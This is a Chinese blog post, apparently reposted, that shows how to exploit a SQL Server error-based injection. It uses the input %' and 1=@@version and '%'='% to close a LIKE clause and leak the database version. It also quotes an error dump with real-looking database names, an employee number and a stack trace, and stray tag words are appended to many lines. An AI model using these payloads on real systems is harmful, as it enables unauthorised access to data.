利用永真条件来实现sql注入方法

时间  2020-12-01
标签 sql 数据库 async orm blog get cmd ast 栏目 SQL 繁體版
原文   原文链接

Q:遇到报错的sql注入,怎么办?sql

 

 

 

 

一、首先,先把部分语句给copy下来:数据库

SELECT @Total=COUNT(1) FROM (select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%') T SELECT * FROM ( SELECT ROW_NUMBER() OVER (ORDER BY FProcStatus ASC,FCreationDate DESC) AS RowNumber,* FROM ( select * from (select *, ISNULL((select MAX(FOperateTime) from EAWP_Administration..TB_XZSQ_ProcInsOperateRecord where FInactivateDate is null and FOperateNO='50237414' and FProcInsID =a.FProcInsID),a.FLastUpdateDate) as ArrivedDate from EAWP_Administration..TB_XZSQ_Apply a where FInactivateDate is null and (FProcStatus=2 or FProcStatus=4) and FCreateBy='50237414') l where 1=1 AND FFormSubTitle LIKE '%B'%' ) AS N ) AS A WHERE A.RowNumber BETWEEN 1 AND 8 at System.Data.SqlClient.SqlConnection.OnError(SqlException exception, Boolean breakConnection, Action`1 wrapCloseInAction) at System.Data.SqlClient.TdsParser.ThrowExceptionAndWarning(TdsParserStateObject stateObj, Boolean callerHasConnectionLock, Boolean asyncClose) at System.Data.SqlClient.TdsParser.TryRun(RunBehavior runBehavior, SqlCommand cmdHandler, SqlDataReader dataStream, BulkCopySimpleResultSet bulkCopyHandler, TdsParserStateObject stateObj, Boolean& dataReady) at System.Data.SqlClient.SqlDataReader.TryConsumeMetaData() at System.Data.SqlClient.SqlDataReader.get_MetaData() at System.Data.SqlClient.SqlCommand.FinishExecuteReader(SqlDataReader ds, RunBehavior runBehavior, String resetOptionsString) at 。。。。。。(后面颇有很长的sql语句)async

 

二、面对复杂的语句,如何下手? 能够把上面的语句简化,容易分析orm

SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B'%')  。。。。。。(后面还有不少就无论了)blog

 

好了,下面开始研究如何注入。get

 

利用永真条件来实现sql注入方法:
(若是不使用永真条件进行判断的话,使用 ' and 1=@@version+-- 那么很复杂的语句的话,会破坏掉整个sql语句的逻辑,致使执行sql查询失败,最终也没法获得版本)cmd

一、若是遇到很复杂的语句怎么办? 那么咱们就把复杂的语句简化为下面这条语句,以避免乱军心:
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%B%')it

二、插入语句: %' and 1=1 and '%'=' 能够让语句拼接正常,而不会报错
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=1 and '%'='%')io

三、开始搞事情:把 1=1 改成 1=@@version 就会把“真”变成“假”,那么数据库将会报错,就会爆出数据库版本
SELECT * FROM (select * from xxx where 1=1 AND F LIKE '%%' and 1=@@version and '%'='%')ast

 

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程